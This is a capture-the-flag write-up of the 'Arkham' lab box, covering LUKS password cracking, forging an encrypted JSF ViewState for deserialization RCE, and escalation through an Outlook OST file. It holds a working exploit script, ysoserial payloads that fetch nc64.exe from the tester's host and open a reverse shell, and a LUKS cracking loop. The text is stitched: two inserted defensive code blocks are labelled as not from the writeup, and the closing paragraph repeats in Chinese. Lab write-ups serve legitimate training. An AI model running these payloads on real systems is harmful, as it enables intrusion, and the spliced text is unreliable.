Summary:
Arkham is a medium-difficulty box. An SMB share leaks a LUKS-encrypted file; cracking it with hashcat or cryptsetup yields a Tomcat backup configuration that exposes the parameters of the JSF ViewState encryption. The JSF page found on port 8080, combined with JSF deserialization RCE, gives a shell as alfred. The Downloads folder of user batman holds an OST file; converting it with readpst yields batman's username and password and a reverse shell, and batman's privileges allow mounting the C: drive to read root.txt.
Tools:
smbclient, cryptsetup, hashcat, ysoserial, readpst
Key concepts:
LUKS encrypted files, JSF encryption algorithm, Apache JSF RCE, OST files
Contents
- Decrypting LUKS to obtain the configuration
- Using the configuration to get a shell
- Privilege escalation
Decrypting LUKS to obtain the configuration
Information gathering
nmap scan of the common ports: port 80 runs "Microsoft IIS httpd 10.0", which according to Wikipedia means the host is Windows 10, Server 2016 or Server 2019; port 445 exposes SMB shares; port 8080 is reported as an HTTP proxy.

```text
$ nmap -sC -sV -oA Arkham/nmap/Arkham 10.10.10.130
# Nmap 7.70 scan initiated Tue Jul 9 22:27:13 2019 as: nmap -sC -sV -oA Arkham/nmap/Arkham 10.10.10.130
Nmap scan report for 10.10.10.130
Host is up (0.26s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"11382-1545655294000"
| Last-Modified: Mon, 24 Dec 2018 12:41:34 GMT
| Content-Type: text/html
| Content-Length: 11382
| Date: Tue, 09 Jul 2019 14:28:30 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Mask Inc.</title>
| <meta name="description" content="A free responsive website template made exclusively for Frittt by Themesforce and Sarfraz Shaukat">
| <meta name="keywords" content="website template, css3, one page, bootstrap, app template, web app, start-up">
| <meta name="author" content="Themesforce and Sarfraz Shaukat for Frittt">
| <link rel="icon" type="image/png" href="favicons/favicon-16x16.png" sizes="16x16">
| <link rel="stylesheet" href="css/bootstrap.css">
| <link rel="stylesheet" href="fonts/font-awesome-4.3.0/css/fon
| RTSPRequest:
| HTTP/1.1 400
| Date: Tue, 09 Jul 2019 14:28:44 GMT
|_ Connection: close
|_http-title: Mask Inc.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 22s, deviation: 0s, median: 22s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-07-09 22:29:21
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul 9 22:29:54 2019 -- 1 IP address (1 host up) scanned in 161.38 seconds
```
Running smbmap -u "guest" -H 10.10.10.130 reveals three shares, "BatShare", "IPC$" and "Users". Inspecting the share contents with smbclient turns up appserver.zip; unpacking it gives backup.img, which file identifies as a LUKS encrypted file.
Cracking the LUKS file
There are three ways to get the files out of the LUKS image on this box:
1. LUKS stands for Linux Unified Key Setup. Wikipedia describes it as: "LUKS is a disk encryption specification created by Clemens Fruhwirth in 2004 and originally intended for Linux; LUKS implements a platform-independent standard on-disk format that can be used by various tools, which facilitates compatibility and interoperability between different disk encryption programs and ensures that they all implement password management in a secure and documented manner." Once LUKS is understood, the question is how to crack it: hashcat supports LUKS, and cryptsetup can open a LUKS file, which allows testing passphrases. The rockyou.txt wordlist yields the password "batmanforever".
The cryptsetup cracking script is as follows:

```python
#!/usr/bin/env python3
import subprocess
import sys

pass_file = sys.argv[1]       # wordlist, e.g. rockyou.txt
luks_file = "backup.img"
count = 56431                 # resume offset: lines already tried in an earlier run
total = 0

with open(pass_file, "r", errors="ignore") as f:
    lines = f.readlines()
total = len(lines)
lines = lines[count:]

for line in lines:
    count += 1
    passwd = line.strip()
    print("Process %s:%s Trying %s..." % (count, total, passwd))
    # --test-passphrase only checks the passphrase; no device mapping is created.
    # The passphrase is fed on stdin (cryptsetup reads it up to the newline).
    r = subprocess.run(["cryptsetup", "luksOpen", "--test-passphrase", luks_file],
                       input=(passwd + "\n").encode())
    if r.returncode == 0:
        print("Password is %s" % passwd)
        break
```
hashcat command: hashcat -m 14600 -a 0 -w 3 backup.img /usr/share/wordlists/rockyou.txt -o luks_password.txt --force
2. binwalk shows that the file contains XML documents, PDF files and images: binwalk -e backup.img
3. Use strings to pull out the XML
On the forum, people cracked it quickly by building a small wordlist out of rockyou.txt. I have not mastered that method, but the idea is good: extract keywords such as bat, man, ark and arkman from the box name and the share names; one expert even guessed the keyword batman outright and cracked it very quickly.
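Before spending GPU time on a leaked image it helps to read what the LUKS header says about the cost of guessing. The following is an added example, not code from the writeup: a minimal parser for the LUKS1 on-disk header (the format hashcat mode 14600 targets) that reports the cipher, hash and the PBKDF2 iteration count of each active key slot. The header bytes it parses are constructed inside the block as sample data; LUKS2 uses a different (JSON-based) header and is rejected here.

```python
import struct

LUKS_MAGIC = b"LUKS\xba\xbe"
PHDR_FMT = ">6sH32s32s32sII20s32sI40s"   # LUKS1 phdr: 208 bytes, big-endian
SLOT_FMT = ">II32sII"                    # one of the 8 key slots, 48 bytes each
KEY_ENABLED, KEY_DISABLED = 0x00AC71F3, 0x0000DEAD

def _cstr(raw):
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")

def parse_luks1_header(blob):
    """Return the LUKS1 header fields, or None if blob is not a LUKS1 image."""
    if len(blob) < 592 or blob[:6] != LUKS_MAGIC or blob[6:8] != b"\x00\x01":
        return None
    (_, version, cipher, mode, hashspec, payload_off, key_bytes,
     _digest, _salt, mk_iter, uuid) = struct.unpack_from(PHDR_FMT, blob, 0)
    slots = []
    for i in range(8):
        active, iters, _, _, stripes = struct.unpack_from(SLOT_FMT, blob, 208 + 48 * i)
        if active == KEY_ENABLED:   # only enabled slots hold a usable passphrase
            slots.append({"slot": i, "iterations": iters, "stripes": stripes})
    return {"version": version, "cipher": _cstr(cipher), "mode": _cstr(mode),
            "hash": _cstr(hashspec), "payload_offset": payload_off,
            "key_bytes": key_bytes, "mk_iterations": mk_iter,
            "uuid": _cstr(uuid), "active_slots": slots}

def build_sample_header():
    """Constructed LUKS1 header with one active slot (sample data, not backup.img)."""
    phdr = struct.pack(PHDR_FMT, LUKS_MAGIC, 1, b"aes", b"xts-plain64", b"sha256",
                       4096, 64, b"\0" * 20, b"\0" * 32, 12345,
                       b"5bd9f4a1-0000-4000-8000-000000000000")
    slots = struct.pack(SLOT_FMT, KEY_ENABLED, 250000, b"\0" * 32, 8, 4000)
    slots += struct.pack(SLOT_FMT, KEY_DISABLED, 0, b"\0" * 32, 0, 0) * 7
    return phdr + slots

if __name__ == "__main__":
    import sys
    # Usage: python3 luks_hdr.py backup.img  (reads only the 592-byte header)
    with open(sys.argv[1] if len(sys.argv) > 1 else "backup.img", "rb") as f:
        print(parse_luks1_header(f.read(592)))
```

A low iteration count in an active slot means each wordlist candidate is cheap to test, which is exactly what makes a rockyou.txt run against a leaked backup practical.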
The following configuration was ultimately recovered from the LUKS-encrypted file:

```xml
<context-param>
<description>State saving method: 'client' or 'server' (=default). See JSF Specification 2.5.2</description>
<param-name>javax.faces.STATE_SAVING_METHOD</param-name>
<param-value>server</param-value>
</context-param>
<context-param>
<param-name>org.apache.myfaces.SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>
</context-param>
<context-param>
<param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>
<param-value>HmacSHA1</param-value>
</context-param>
<context-param>
<param-name>org.apache.myfaces.MAC_SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>
</context-param>
```
Using the configuration to get a shell
JSF ViewState
The recovered configuration confirms the application is JSF. A Google search turned up an article on exploiting JSF misconfigurations, which explains that JSF is subject to Java deserialization vulnerabilities; combined with the endpoint on port 8080 that uses ViewStates, what remains is to build a reverse-shell exploit. (I got stuck here while doing the box: after seeing the ViewStates I did not know how to combine them with the JSF misconfiguration from the article to get RCE, and assumed I had to decrypt the ViewState, add the payload and re-encrypt it. After the box retired I learned from Ippsec's and 0xRick's writeups that you can simply create an encrypted ViewState directly. Ippsec's method for analysing the deserialized data is also very useful; I recommend watching it on YouTube.)
The payload is generated with ysoserial and sent in an HTTP request to get RCE. I originally generated it with Myfaces1 and Myfaces2, but those never executed; after reading 0xRick's writeup I switched to CommonsCollections5. The payloads are cmd.exe /c powershell -c Invoke-WebRequest -Uri "http://10.10.14.11:81/nc64.exe" -OutFile "C:\windows\system32\spool\drivers\color\nc.exe"
and cmd.exe /c "C:\windows\system32\spool\drivers\color\nc.exe" -e cmd.exe 10.10.14.11 1337
The script is as follows:

```python
# -*- coding: utf-8 -*-
import base64
import hmac
import subprocess
from hashlib import sha1

import pyDes
import requests

# Endpoint on port 8080 that consumes javax.faces.ViewState
URL = 'http://10.10.10.130:8080/userSubscribe.faces'
# org.apache.myfaces.SECRET / MAC_SECRET from web.xml: base64 "SnNGOTg3Ni0=" is "JsF9876-"
KEY = b'JsF9876-'


def encrypt_sign(payload):
    """Encrypt the serialized object with DES-ECB (PKCS5 padding) and append an
    HMAC-SHA1 tag, reproducing how MyFaces protects the ViewState with the leaked key."""
    cipher = pyDes.des(KEY, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
    enc_payload = cipher.encrypt(payload)
    hmac_sig = hmac.new(KEY, enc_payload, sha1)
    return base64.b64encode(enc_payload + hmac_sig.digest()).decode()


def send_rce(payload):
    """Submit the form with the forged ViewState; the server deserializes it."""
    data = {
        'j_id_jsp_1623871077_1:email': 'test',
        'j_id_jsp_1623871077_1:submit': 'SIGN UP',
        'j_id_jsp_1623871077_1_SUBMIT': '1',
        'javax.faces.ViewState': payload,
    }
    res = requests.post(url=URL, data=data)
    return res.text


def create_payload(cmd):
    """Build a CommonsCollections5 gadget chain for cmd with ysoserial."""
    command = "java -jar /opt/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections5 '{cmd}' > /tmp/payload.bin".format(cmd=cmd)
    print(command)
    status, msg = subprocess.getstatusoutput(command)
    if status != 0:
        print(msg)
        return None
    with open('/tmp/payload.bin', 'rb') as f:
        return f.read()


if __name__ == '__main__':
    while True:
        cmd = input('cmd=> ')
        if cmd in ['quit', 'exit', 'q']:
            break
        payload = create_payload(cmd)
        if payload:
            payload = encrypt_sign(payload)
            print(payload)
            print(send_rce(payload))
```
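From the defender's side, the lesson of the script above is that the ViewState MAC only rejects tokens built without the key; once web.xml leaks, the key is the attacker's. The following is an added example, not part of the writeup: it parses the recovered context-params from a constructed web.xml fragment, flags the settings that make the leak fatal (DES as the cipher, HmacSHA1, one secret used for both encryption and MAC), and verifies the tag on a ViewState the way MyFaces lays it out (base64 of ciphertext followed by a 20-byte HMAC-SHA1). The sample tokens in demo() are constructed; no real ViewState is decoded.

```python
import base64
import hmac
import xml.etree.ElementTree as ET
from hashlib import sha1
# Constructed sample: the four context-params recovered from the backup image.
SAMPLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee">
<context-param><param-name>javax.faces.STATE_SAVING_METHOD</param-name><param-value>server</param-value></context-param>
<context-param><param-name>org.apache.myfaces.SECRET</param-name><param-value>SnNGOTg3Ni0=</param-value></context-param>
<context-param><param-name>org.apache.myfaces.MAC_ALGORITHM</param-name><param-value>HmacSHA1</param-value></context-param>
<context-param><param-name>org.apache.myfaces.MAC_SECRET</param-name><param-value>SnNGOTg3Ni0=</param-value></context-param>
</web-app>"""

_local = lambda tag: tag.rsplit("}", 1)[-1]   # strip the web-app XML namespace, if any

def context_params(xml_text):
    """Map every <param-name> to its <param-value>."""
    params = {}
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) == "context-param":
            kv = {_local(c.tag): (c.text or "").strip() for c in el}
            params[kv.get("param-name")] = kv.get("param-value")
    return params

def audit_myfaces(params):
    """Flag ViewState protection settings that turn a leaked web.xml into RCE."""
    findings = []
    secret = base64.b64decode(params.get("org.apache.myfaces.SECRET", ""))
    mac_secret = base64.b64decode(params.get("org.apache.myfaces.MAC_SECRET", ""))
    if params.get("org.apache.myfaces.ALGORITHM", "DES") == "DES":   # MyFaces default
        findings.append("cipher is DES (8-byte key); set org.apache.myfaces.ALGORITHM to AES")
    if params.get("org.apache.myfaces.MAC_ALGORITHM", "HmacSHA1") == "HmacSHA1":
        findings.append("MAC is HmacSHA1; prefer HmacSHA256")
    if secret and secret == mac_secret:
        findings.append("SECRET and MAC_SECRET are identical: one leak both decrypts and forges")
    return findings

def verify_viewstate(token_b64, mac_secret):
    """Check the tag MyFaces appends to the state: base64(ciphertext || HMAC-SHA1)."""
    raw = base64.b64decode(token_b64)
    body, tag = raw[:-20], raw[-20:]
    return hmac.compare_digest(tag, hmac.new(mac_secret, body, sha1).digest())

def demo():
    """Audit the sample config; the MAC rejects tampering but not a holder of the key."""
    params = context_params(SAMPLE_WEB_XML)
    mac_secret = base64.b64decode(params["org.apache.myfaces.MAC_SECRET"])
    body = b"\x00" * 16                                  # stands in for DES ciphertext
    token = base64.b64encode(body + hmac.new(mac_secret, body, sha1).digest()).decode()
    tampered = base64.b64encode(b"\x01" + base64.b64decode(token)[1:]).decode()
    return audit_myfaces(params), verify_viewstate(token, mac_secret), verify_viewstate(tampered, mac_secret)
```

Rotating both secrets to fresh random values and keeping web.xml out of backups that land on a guest-readable share would have closed this path regardless of the gadget chain used.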
As for the payload, I tried many commands, but in the end only the ones from 0xRick's writeup worked; every other command and directory I tried failed. Finally I got the reverse shell and read user.txt:

```text
root@OSCP:~# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.130] 49696
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\tomcat\apache-tomcat-8.5.37\bin>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::cd7b:2ab9:a1e0:21e3
Link-local IPv6 Address . . . . . : fe80::cd7b:2ab9:a1e0:21e3%9
IPv4 Address. . . . . . . . . . . : 10.10.10.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:febd:e2c6%9
10.10.10.2
C:\Users\Alfred\Desktop>ipconfig && type user.txt
ipconfig && type user.txt
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::cd7b:2ab9:a1e0:21e3
Link-local IPv6 Address . . . . . : fe80::cd7b:2ab9:a1e0:21e3%9
IPv4 Address. . . . . . . . . . . : 10.10.10.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:febd:e2c6%9
10.10.10.2
ba659321c89c48a3dcb915bc46d58071
```
Privilege escalation
After getting user.txt I tried to run PowerUp for enumeration, but PowerShell execution failed, so I had to browse around manually. In batman's user directory I found an Outlook OST file; converting it with readpst -rS alfred@arkham.local.ost produced an image that records batman's password. With that I got a reverse shell as batman. net user shows batman is a member of the Administrators group, so I tried reading C:/Users/Administrator/Desktop/root.txt directly, which was denied. I originally obtained it after elevating with runas, but that kept failing afterwards, so in the end I used 0xRick's method to get root.txt.
转换之后获得一副图片,图片中记录这batman用户的密码;然后获取到batman用户的反弹shell,net user发现batman是管理员组成员,因此直接读取C:/Users/Administrator/Desktop/root.txt,发现访问被拒绝;这里本来通过runas提升权限后获取的,后来一直失败,最终还是利用0xRick的方法获取的root.txt